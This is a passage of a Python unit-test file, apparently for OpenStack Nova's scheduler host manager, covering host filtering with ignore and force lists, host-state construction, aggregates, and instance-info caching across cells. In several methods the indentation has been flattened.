        # [1] and [3] are host2 and host4
        info = {'expected_objs': [self.fake_hosts[1], self.fake_hosts[3]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result)
def test_get_filtered_hosts_with_ignore_case_insensitive(self):
fake_properties = objects.RequestSpec(
instance_uuids=uuids.fakehost,
ignore_hosts=['FAKE_HOST1', 'FaKe_HoSt3', 'Fake_Multihost'],
force_hosts=[],
force_nodes=[])
# [1] and [3] are host2 and host4
info = {'expected_objs': [self.fake_hosts[1], self.fake_hosts[3]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result)
    def test_get_filtered_hosts_with_force_hosts(self):
        # force_hosts bypasses the filters entirely (hence filters=False in
        # the verification) and keeps only the named hosts.
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=['fake_host1', 'fake_host3', 'fake_host5'],
            force_nodes=[])
        # [0] and [2] are host1 and host3
        info = {'expected_objs': [self.fake_hosts[0], self.fake_hosts[2]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
def test_get_filtered_hosts_with_force_case_insensitive(self):
fake_properties = objects.RequestSpec(
instance_uuids=uuids.fakehost,
ignore_hosts=[],
force_hosts=['FAKE_HOST1', 'FaKe_HoSt3', 'fake_host4',
'faKe_host5'],
force_nodes=[])
# [1] and [3] are host2 and host4
info = {'expected_objs': [self.fake_hosts[0], self.fake_hosts[2],
self.fake_hosts[3]],
'expected_fprops': fake_properties}
self._mock_get_filtered_hosts(info)
result = self.host_manager.get_filtered_hosts(self.fake_hosts,
fake_properties)
self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_no_matching_force_hosts(self):
        # If force_hosts matches nothing, the result is empty and the
        # filter pipeline is never invoked.
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=['fake_host5', 'fake_host6'],
            force_nodes=[])
        info = {'expected_objs': [],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        with mock.patch.object(self.host_manager.filter_handler,
                'get_filtered_objects') as fake_filter:
            result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
            self.assertFalse(fake_filter.called)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_ignore_and_force_hosts(self):
        # Ensure ignore_hosts processed before force_hosts in host filters.
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=['fake_host1'],
            force_hosts=['fake_host3', 'fake_host1'],
            force_nodes=[])
        # only fake_host3 should be left.
        info = {'expected_objs': [self.fake_hosts[2]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_force_host_and_many_nodes(self):
        # Ensure all nodes returned for a host with many nodes
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=['fake_multihost'],
            force_nodes=[])
        # [4]-[7] are the four fake-nodeN states of fake_multihost.
        info = {'expected_objs': [self.fake_hosts[4], self.fake_hosts[5],
                                  self.fake_hosts[6], self.fake_hosts[7]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_force_nodes(self):
        # force_nodes selects by nodename; unknown nodes are ignored.
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=[],
            force_nodes=['fake-node2', 'fake-node4', 'fake-node9'])
        # [5] is fake-node2, [7] is fake-node4
        info = {'expected_objs': [self.fake_hosts[5], self.fake_hosts[7]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_force_hosts_and_nodes(self):
        # Ensure only overlapping results if both force host and node
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=['fake-host1', 'fake_multihost'],
            force_nodes=['fake-node2', 'fake-node9'])
        # [5] is fake-node2
        info = {'expected_objs': [self.fake_hosts[5]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_force_hosts_and_wrong_nodes(self):
        # Ensure non-overlapping force_node and force_host yield no result
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=[],
            force_hosts=['fake_multihost'],
            force_nodes=['fake-node'])
        info = {'expected_objs': [],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_ignore_hosts_and_force_nodes(self):
        # Ensure ignore_hosts can coexist with force_nodes
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=['fake_host1', 'fake_host2'],
            force_hosts=[],
            force_nodes=['fake-node4', 'fake-node2'])
        # [5] is fake-node2, [7] is fake-node4; the ignored hosts do not
        # intersect the forced nodes.
        info = {'expected_objs': [self.fake_hosts[5], self.fake_hosts[7]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    def test_get_filtered_hosts_with_ignore_hosts_and_force_same_nodes(self):
        # Ensure ignore_hosts is processed before force_nodes
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=['fake_multihost'],
            force_hosts=[],
            force_nodes=['fake_node4', 'fake_node2'])
        # Ignoring the multi-node host removes every forced node candidate.
        info = {'expected_objs': [],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result, False)
    @mock.patch('nova.scheduler.host_manager.LOG')
    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_all_host_states(self, mock_get_by_host, mock_get_all,
                                 mock_get_by_binary, mock_log):
        # End-to-end HostState construction from the fakes fixtures.
        mock_get_by_host.return_value = objects.InstanceList()
        mock_get_all.return_value = fakes.COMPUTE_NODES
        mock_get_by_binary.return_value = fakes.SERVICES
        context = 'fake_context'
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           self.host_manager.get_all_host_states(context)}
        self.assertEqual(4, len(host_states_map))
        # Two warnings expected, in order: node3 over-reports disk, and one
        # compute node has no matching service record.
        calls = [
            mock.call(
                "Host %(hostname)s has more disk space than database "
                "expected (%(physical)s GB > %(database)s GB)",
                {'physical': 3333, 'database': 3072, 'hostname': 'node3'}
            ),
            mock.call(
                "No compute service record found for host %(host)s",
                {'host': 'fake'}
            )
        ]
        self.assertEqual(calls, mock_log.warning.call_args_list)
        # Check that .service is set properly
        for i in range(4):
            compute_node = fakes.COMPUTE_NODES[i]
            host = compute_node.host
            node = compute_node.hypervisor_hostname
            state_key = (host, node)
            self.assertEqual(host_states_map[state_key].service,
                    obj_base.obj_to_primitive(fakes.get_service_by_host(host)))
        # Free RAM/disk figures must match the fake compute node records.
        self.assertEqual(host_states_map[('host1', 'node1')].free_ram_mb,
                         512)
        # 511GB
        self.assertEqual(host_states_map[('host1', 'node1')].free_disk_mb,
                         524288)
        self.assertEqual(host_states_map[('host2', 'node2')].free_ram_mb,
                         1024)
        # 1023GB
        self.assertEqual(host_states_map[('host2', 'node2')].free_disk_mb,
                         1048576)
        self.assertEqual(host_states_map[('host3', 'node3')].free_ram_mb,
                         3072)
        # 3071GB
        self.assertEqual(host_states_map[('host3', 'node3')].free_disk_mb,
                         3145728)
        self.assertThat(
            objects.NUMATopology.obj_from_db_obj(
                host_states_map[('host3', 'node3')].numa_topology
            )._to_dict(),
            matchers.DictMatches(fakes.NUMA_TOPOLOGY._to_dict()))
        self.assertEqual(host_states_map[('host4', 'node4')].free_ram_mb,
                         8192)
        # 8191GB
        self.assertEqual(host_states_map[('host4', 'node4')].free_disk_mb,
                         8388608)
    @mock.patch.object(nova.objects.InstanceList, 'get_by_host')
    @mock.patch.object(host_manager.HostState, '_update_from_compute_node')
    @mock.patch.object(objects.ComputeNodeList, 'get_all')
    @mock.patch.object(objects.ServiceList, 'get_by_binary')
    def test_get_all_host_states_with_no_aggs(self, svc_get_by_binary,
                                              cn_get_all, update_from_cn,
                                              mock_get_by_host):
        # A host belonging to no aggregate gets an empty aggregates list.
        svc_get_by_binary.return_value = [objects.Service(host='fake')]
        cn_get_all.return_value = [
            objects.ComputeNode(host='fake', hypervisor_hostname='fake')]
        mock_get_by_host.return_value = objects.InstanceList()
        self.host_manager.host_aggregates_map = collections.defaultdict(set)
        hosts = self.host_manager.get_all_host_states('fake-context')
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        host_state = host_states_map[('fake', 'fake')]
        self.assertEqual([], host_state.aggregates)
    @mock.patch.object(nova.objects.InstanceList, 'get_by_host')
    @mock.patch.object(host_manager.HostState, '_update_from_compute_node')
    @mock.patch.object(objects.ComputeNodeList, 'get_all')
    @mock.patch.object(objects.ServiceList, 'get_by_binary')
    def test_get_all_host_states_with_matching_aggs(self, svc_get_by_binary,
                                                    cn_get_all,
                                                    update_from_cn,
                                                    mock_get_by_host):
        # A host mapped to aggregate id 1 gets that Aggregate object on its
        # HostState.
        svc_get_by_binary.return_value = [objects.Service(host='fake')]
        cn_get_all.return_value = [
            objects.ComputeNode(host='fake', hypervisor_hostname='fake')]
        mock_get_by_host.return_value = objects.InstanceList()
        fake_agg = objects.Aggregate(id=1)
        self.host_manager.host_aggregates_map = collections.defaultdict(
            set, {'fake': set([1])})
        self.host_manager.aggs_by_id = {1: fake_agg}
        hosts = self.host_manager.get_all_host_states('fake-context')
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        host_state = host_states_map[('fake', 'fake')]
        self.assertEqual([fake_agg], host_state.aggregates)
    @mock.patch.object(nova.objects.InstanceList, 'get_by_host')
    @mock.patch.object(host_manager.HostState, '_update_from_compute_node')
    @mock.patch.object(objects.ComputeNodeList, 'get_all')
    @mock.patch.object(objects.ServiceList, 'get_by_binary')
    def test_get_all_host_states_with_not_matching_aggs(self,
                                                        svc_get_by_binary,
                                                        cn_get_all,
                                                        update_from_cn,
                                                        mock_get_by_host):
        # Aggregates mapped to a *different* host must not leak onto this
        # host's state.
        svc_get_by_binary.return_value = [objects.Service(host='fake'),
                                          objects.Service(host='other')]
        cn_get_all.return_value = [
            objects.ComputeNode(host='fake', hypervisor_hostname='fake'),
            objects.ComputeNode(host='other', hypervisor_hostname='other')]
        mock_get_by_host.return_value = objects.InstanceList()
        fake_agg = objects.Aggregate(id=1)
        self.host_manager.host_aggregates_map = collections.defaultdict(
            set, {'other': set([1])})
        self.host_manager.aggs_by_id = {1: fake_agg}
        hosts = self.host_manager.get_all_host_states('fake-context')
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        host_state = host_states_map[('fake', 'fake')]
        self.assertEqual([], host_state.aggregates)
    @mock.patch.object(nova.objects.InstanceList, 'get_by_host',
                       return_value=objects.InstanceList())
    @mock.patch.object(host_manager.HostState, '_update_from_compute_node')
    @mock.patch.object(objects.ComputeNodeList, 'get_all')
    @mock.patch.object(objects.ServiceList, 'get_by_binary')
    def test_get_all_host_states_corrupt_aggregates_info(self,
                                                         svc_get_by_binary,
                                                         cn_get_all,
                                                         update_from_cn,
                                                         mock_get_by_host):
        """Regression test for bug 1605804
        A host can be in multiple host-aggregates at the same time. When a
        host gets removed from an aggregate in thread A and this aggregate
        gets deleted in thread B, there can be a race-condition where the
        mapping data in the host_manager can get out of sync for a moment.
        This test simulates this condition for the bug-fix.
        """
        host_a = 'host_a'
        host_b = 'host_b'
        svc_get_by_binary.return_value = [objects.Service(host=host_a),
                                          objects.Service(host=host_b)]
        cn_get_all.return_value = [
            objects.ComputeNode(host=host_a, hypervisor_hostname=host_a),
            objects.ComputeNode(host=host_b, hypervisor_hostname=host_b)]
        aggregate = objects.Aggregate(id=1)
        aggregate.hosts = [host_a, host_b]
        aggr_list = objects.AggregateList()
        aggr_list.objects = [aggregate]
        self.host_manager.update_aggregates(aggr_list)
        # Remove host_b from the aggregate, then delete the aggregate while
        # the manager still maps host_b to it — the stale mapping must not
        # make get_all_host_states blow up.
        aggregate.hosts = [host_a]
        self.host_manager.delete_aggregate(aggregate)
        self.host_manager.get_all_host_states('fake-context')
    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_all_host_states_updated(self, mock_get_by_host,
                                         mock_get_all_comp,
                                         mock_get_svc_by_binary):
        # When the cached instance info is flagged 'updated', the host state
        # must be filled from the cache without querying the database.
        mock_get_all_comp.return_value = fakes.COMPUTE_NODES
        mock_get_svc_by_binary.return_value = fakes.SERVICES
        context = 'fake_context'
        hm = self.host_manager
        inst1 = objects.Instance(uuid=uuids.instance)
        cn1 = objects.ComputeNode(host='host1')
        hm._instance_info = {'host1': {'instances': {uuids.instance: inst1},
                                       'updated': True}}
        host_state = host_manager.HostState('host1', cn1, uuids.cell)
        self.assertFalse(host_state.instances)
        mock_get_by_host.return_value = None
        host_state.update(
                inst_dict=hm._get_instance_info(context, cn1))
        # No DB hit: the cached instances were used directly.
        self.assertFalse(mock_get_by_host.called)
        self.assertTrue(host_state.instances)
        self.assertEqual(host_state.instances[uuids.instance], inst1)
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states_not_updated(self, mock_get_by_host,
mock_get_all_comp,
mock_get_svc_by_binary):
mock_get_all_comp.return_value = fakes.COMPUTE_NODES
mock_get_svc_by_binary.return_value = fakes.SERVICES
context = 'fake_context'
hm = self.host_manager
inst1 = objects.Instance(uuid=uuids.instance)
cn1 = objects.ComputeNode(host='host1')
hm._instance_info = {'host1': {'instances': {uuids.instance: inst1},
'updated': False}}
host_state = host_manager.HostState('host1', cn1, uuids.cell)
self.assertFalse(host_state.instances)
mock_get_by_host.return_value = objects.InstanceList(objects=[inst1])
host_state.update(
inst_dict=hm._get_instance_info(context, cn1))
mock_get_by_host.assert_called_once_with(
context, cn1.host, expected_attrs=[])
self.assertTrue(host_state.instances)
self.assertEqual(host_state.instances[uuids.instance], inst1)
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_recreate_instance_info(self, mock_get_by_host):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
new_inst_list = objects.InstanceList(objects=[inst1, inst2])
mock_get_by_host.return_value = new_inst_list
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': True,
}}
self.host_manager._recreate_instance_info('fake_context', host_name)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), len(new_inst_list))
self.assertFalse(new_info['updated'])
def test_update_instance_info(self):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
inst3 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_3,
host=host_name)
inst4 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_4,
host=host_name)
update = objects.InstanceList(objects=[inst3, inst4])
self.host_manager.update_instance_info('fake_context', host_name,
update)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), 4)
self.assertTrue(new_info['updated'])
def test_update_instance_info_unknown_host(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
bad_host = 'bad_host'
inst3 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_3,
host=bad_host)
inst_list3 = objects.InstanceList(objects=[inst3])
self.host_manager.update_instance_info('fake_context', bad_host,
inst_list3)
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', bad_host)
self.assertEqual(len(new_info['instances']), len(orig_inst_dict))
self.assertFalse(new_info['updated'])
@mock.patch('nova.objects.HostMapping.get_by_host',
side_effect=exception.HostMappingNotFound(name='host1'))
def test_update_instance_info_unknown_host_mapping_not_found(self,
get_by_host):
"""Tests that case that update_instance_info is called with an
unregistered host so the host manager attempts to recreate the
instance list, but there is no host mapping found for the given
host (it might have just started not be discovered for cells
v2 yet).
"""
ctxt = nova_context.RequestContext()
instance_info = objects.InstanceList()
self.host_manager.update_instance_info(ctxt, 'host1', instance_info)
self.assertDictEqual(
{}, self.host_manager._instance_info['host1']['instances'])
get_by_host.assert_called_once_with(ctxt, 'host1')
def test_delete_instance_info(self):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.delete_instance_info('fake_context', host_name,
inst1.uuid)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), 1)
self.assertTrue(new_info['updated'])
def test_delete_instance_info_unknown_host(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
bad_host = 'bad_host'
self.host_manager.delete_instance_info('fake_context', bad_host,
uuids.instance_1)
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', bad_host)
self.assertEqual(len(new_info['instances']), len(orig_inst_dict))
self.assertFalse(new_info['updated'])
def test_sync_instance_info(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.sync_instance_info('fake_context', host_name,
[uuids.instance_2,
uuids.instance_1])
new_info = self.host_manager._instance_info[host_name]
self.assertFalse(self.host_manager._recreate_instance_info.called)
self.assertTrue(new_info['updated'])
def test_sync_instance_info_fail(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.sync_instance_info('fake_context', host_name,
[uuids.instance_2,
uuids.instance_1, 'new'])
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', host_name)
self.assertFalse(new_info['updated'])
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells(self, mock_sl, mock_cn, mock_cm):
cells = [
objects.CellMapping(uuid=uuids.cell1,
db_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
db_connection='none://2',
transport_url='none://'),
]
mock_cm.return_value = cells
mock_sl.side_effect = [
[objects.ServiceList(host='foo')],
[objects.ServiceList(host='bar')],
]
mock_cn.side_effect = [
[objects.ComputeNode(host='foo')],
[objects.ComputeNode(host='bar')],
]
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, cells)
self.assertEqual({uuids.cell1: ['foo'],
uuids.cell2: ['bar']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['bar', 'foo'], sorted(list(srv.keys())))
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all_by_uuids')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells_uuid(self, mock_sl, mock_cn, mock_cm):
cells = [
objects.CellMapping(uuid=uuids.cell1,
db_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
db_connection='none://2',
transport_url='none://'),
]
mock_cm.return_value = cells
mock_sl.side_effect = [
[objects.ServiceList(host='foo')],
[objects.ServiceList(host='bar')],
]
mock_cn.side_effect = [
[objects.ComputeNode(host='foo')],
[objects.ComputeNode(host='bar')],
]
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, cells,
[])
self.assertEqual({uuids.cell1: ['foo'],
uuids.cell2: ['bar']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['bar', 'foo'], sorted(list(srv.keys())))
@mock.patch('nova.context.target_cell')
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells_limit_to_cell(self, mock_sl,
mock_cn, mock_cm,
mock_target):
host_manager.LOG.debug = host_manager.LOG.error
cells = [
objects.CellMapping(uuid=uuids.cell1,
database_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
database_connection='none://2',
transport_url='none://'),
]
mock_sl.return_value = [objects.ServiceList(host='foo')]
mock_cn.return_value = [objects.ComputeNode(host='foo')]
mock_cm.return_value = cells
@contextlib.contextmanager
def fake_set_target(context, cell):
yield mock.sentinel.cctxt
mock_target.side_effect = fake_set_target
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(
context, cells=cells[1:])
self.assertEqual({uuids.cell2: ['foo']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['foo'], list(srv.keys()))
# NOTE(danms): We have two cells, but we should only have
# targeted one if we honored the only-cell destination requirement,
# and only looked up services and compute nodes in one
mock_target.assert_called_once_with(context, cells[1])
mock_cn.assert_called_once_with(mock.sentinel.cctxt)
mock_sl.assert_called_once_with(mock.sentinel.cctxt, 'nova-compute',
include_disabled=True)
@mock.patch('nova.context.scatter_gather_cells')
def test_get_computes_for_cells_failures(self, mock_sg):
mock_sg.return_value = {
uuids.cell1: ([mock.MagicMock(host='a'), mock.MagicMock(host='b')],
[mock.sentinel.c1n1, mock.sentinel.c1n2]),
uuids.cell2: nova_context.did_not_respond_sentinel,
uuids.cell3: nova_context.raised_exception_sentinel,
}
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, [])
self.assertEqual({uuids.cell1: [mock.sentinel.c1n1,
mock.sentinel.c1n2]}, cns)
self.assertEqual(['a', 'b'], sorted(srv.keys()))
class HostManagerChangedNodesTestCase(test.NoDBTestCase):
    """Test case for HostManager class."""

    @mock.patch.object(host_manager.HostManager, '_init_instance_info')
    @mock.patch.object(host_manager.HostManager, '_init_aggregates')
    def setUp(self, mock_init_agg, mock_init_inst):
        # The _init_* helpers are patched out so constructing the manager
        # performs no DB or RPC work.
        super(HostManagerChangedNodesTestCase, self).setUp()
        self.host_manager = host_manager.HostManager()
        self.fake_hosts = [
            host_manager.HostState('host1', 'node1', uuids.cell),
            host_manager.HostState('host2', 'node2', uuids.cell),
            host_manager.HostState('host3', 'node3', uuids.cell),
            host_manager.HostState('host4', 'node4', uuids.cell)
        ]

    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_all_host_states(self, mock_get_by_host, mock_get_all,
                                 mock_get_by_binary):
        """Every fake compute node yields one host state."""
        mock_get_by_host.return_value = objects.InstanceList()
        mock_get_all.return_value = fakes.COMPUTE_NODES
        mock_get_by_binary.return_value = fakes.SERVICES
        context = 'fake_context'

        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           self.host_manager.get_all_host_states(context)}
        self.assertEqual(len(host_states_map), 4)

    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_all_host_states_after_delete_one(self, mock_get_by_host,
                                                  mock_get_all,
                                                  mock_get_by_binary):
        """A node removed between calls disappears from the host states."""
        # Filter 'node4' out of the listing used for the second call.
        getter = (lambda n: n.hypervisor_hostname
                  if 'hypervisor_hostname' in n else None)
        running_nodes = [n for n in fakes.COMPUTE_NODES
                         if getter(n) != 'node4']
        mock_get_by_host.return_value = objects.InstanceList()
        # side_effect order matters: first call sees all nodes, the second
        # only the running ones.
        mock_get_all.side_effect = [fakes.COMPUTE_NODES, running_nodes]
        mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]
        context = 'fake_context'

        # first call: all nodes
        hosts = self.host_manager.get_all_host_states(context)
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        self.assertEqual(len(host_states_map), 4)

        # second call: just running nodes
        hosts = self.host_manager.get_all_host_states(context)
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        self.assertEqual(len(host_states_map), 3)

    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_all_host_states_after_delete_all(self, mock_get_by_host,
                                                  mock_get_all,
                                                  mock_get_by_binary):
        """Deleting every node leaves no host states on the second call."""
        mock_get_by_host.return_value = objects.InstanceList()
        mock_get_all.side_effect = [fakes.COMPUTE_NODES, []]
        mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]
        context = 'fake_context'

        # first call: all nodes
        hosts = self.host_manager.get_all_host_states(context)
        # get_all_host_states returns a generator, so make a map from it
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        self.assertEqual(len(host_states_map), 4)

        # second call: no nodes
        hosts = self.host_manager.get_all_host_states(context)
        host_states_map = {(state.host, state.nodename): state for state in
                           hosts}
        self.assertEqual(len(host_states_map), 0)

    @mock.patch('nova.objects.ServiceList.get_by_binary')
    @mock.patch('nova.objects.ComputeNodeList.get_all_by_uuids')
    @mock.patch('nova.objects.InstanceList.get_by_host')
    def test_get_host_states_by_uuids(self, mock_get_by_host, mock_get_all,
                                      mock_get_by_binary):
        """Each concurrent request keeps its own consistent host snapshot."""
        mock_get_by_host.return_value = objects.InstanceList()
        mock_get_all.side_effect = [fakes.COMPUTE_NODES, []]
        mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]

        # Request 1: all nodes can satisfy the request
        hosts1 = self.host_manager.get_host_states_by_uuids(
            mock.sentinel.ctxt1, mock.sentinel.uuids1, objects.RequestSpec())
        # get_host_states_by_uuids returns a generator so convert the values
        # into an iterator
        host_states1 = iter(hosts1)

        # Request 2: no nodes can satisfy the request
        hosts2 = self.host_manager.get_host_states_by_uuids(
            mock.sentinel.ctxt2, mock.sentinel.uuids2, objects.RequestSpec())
        host_states2 = iter(hosts2)

        # Fake a concurrent request that is still processing the first result
        # to make sure all nodes are still available candidates to Request 1.
        num_hosts1 = len(list(host_states1))
        self.assertEqual(4, num_hosts1)

        # Verify that no nodes are available to Request 2.
        num_hosts2 = len(list(host_states2))
        self.assertEqual(0, num_hosts2)
class HostStateTestCase(test.NoDBTestCase):
    """Test case for HostState class."""

    # update_from_compute_node() and consume_from_request() are tested
    # in HostManagerTestCase.test_get_all_host_states()

    @mock.patch('nova.utils.synchronized',
